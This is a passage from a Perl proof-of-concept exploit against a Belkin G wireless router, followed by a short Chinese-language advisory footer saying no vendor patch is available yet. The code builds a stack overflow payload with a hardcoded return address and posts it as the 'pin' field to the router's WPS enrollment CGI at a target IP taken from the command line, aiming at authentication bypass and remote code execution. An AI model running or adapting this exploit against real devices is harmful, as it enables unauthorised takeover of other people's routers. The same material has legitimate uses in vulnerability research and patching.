my $junk="A"x32;
my $s0="BBBB";
my $s1="CCCC";
my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
my $nop="\x20\x20\x20\x20";
my $payload=$junk.$s0.$s1.$ra.$nop;
$url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
$response = $browser->post( $url,[ 'pin' => "$payload"]);
if( !$response->content )
{
print "[-] Damn! Something went wrong. This might not work here :-/\n";
}
else
{
print "[-] Done! \\m/\n";
}
}
sub Welcome()
{
print "\n\n+------------------------------------------+\n";
print "| Belkin G Wireless Router Remote Exploit |\n";
print "| (Authentication bypass & RCE PoC) |\n";
print "+------------------------------------------+\n";
print "[+] By Aodrulez.\n";
print "\n[+] Usage : perl $0 router_ip";
print "\n[!] Example : perl $0 X.X.X.X";
if (!$ARGV[0])
{
print "\n[-] (o_0) Seriously??\n";
exit;
}
$ip=$ARGV[0];
print "\n[+] Target IP : $ip\n";
}
# Burn!!
Welcome();
Authenticate();
# End of exploit code.
建议:
--------------------------------------------------------------------------------
厂商补丁:
Belkin
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: